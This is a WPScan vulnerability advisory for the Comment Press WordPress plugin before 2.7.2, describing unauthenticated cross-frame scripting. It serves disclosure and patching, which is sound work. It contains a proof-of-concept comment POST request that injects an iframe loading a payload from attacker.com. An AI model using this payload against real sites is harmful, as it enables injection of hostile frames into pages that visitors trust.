WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Comment Press < 2.7.2 - Unauthenticated Cross-Frame Scripting

Description

An Unauthenticated Cross-Frame Scripting vulnerability was discovered in the Comment Press plugin v2.7.0 for WordPress.

Proof of Concept

[!] :: PoC (Burp Suite):

POST /wp-comments-post.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 229
Origin: https://example.com.com
Referer: https://example.com.com/?post_id=8%27&comments=13%27&get=60%27&order=DESC

author=Ex.Mi&email=poc%40exmi.xss&comment=%3C!--%3E%3Ciframe%20src%3D%2F%2Fattacker.com%2Fpayload%2Fxfsii.html%20sandbox%3Dallow-scripts%3E%3C%2Fiframe%3E&name=username&nombre=&form-saic=&comment_post_ID=13&comment_parent=0

Affects Plugins

comment-press
Fixed in version 2.7.2

References

URL
https://codecanyon.net/item/commentpress-ajax-comments-insert-edit-and-delete-comments-for-wp/4542951
URL
https://ex-mi.ru/exploit/[2020-08-28]-[WordPress]-comment-press-plugin-v2.7.0.txt

Classification

Type

CROSS FRAME SCRIPTING

OWASP top 10
A1: Injection
CWE
CWE-80

Miscellaneous

Original Researcher

Ex.Mi

Submitter

Ex.Mi

Submitter website
https://ex-mi.ru
Verified

Yes

WPVDB ID
9b4696c5-9b6f-41d3-9e22-5a3a5f701cda

Timeline

Publicly Published

2020-10-15 (about 2 years ago)

Added

2020-10-15 (about 2 years ago)

Last Updated

2020-10-17 (about 2 years ago)

Our Other Services

WPScan WordPress Security Plugin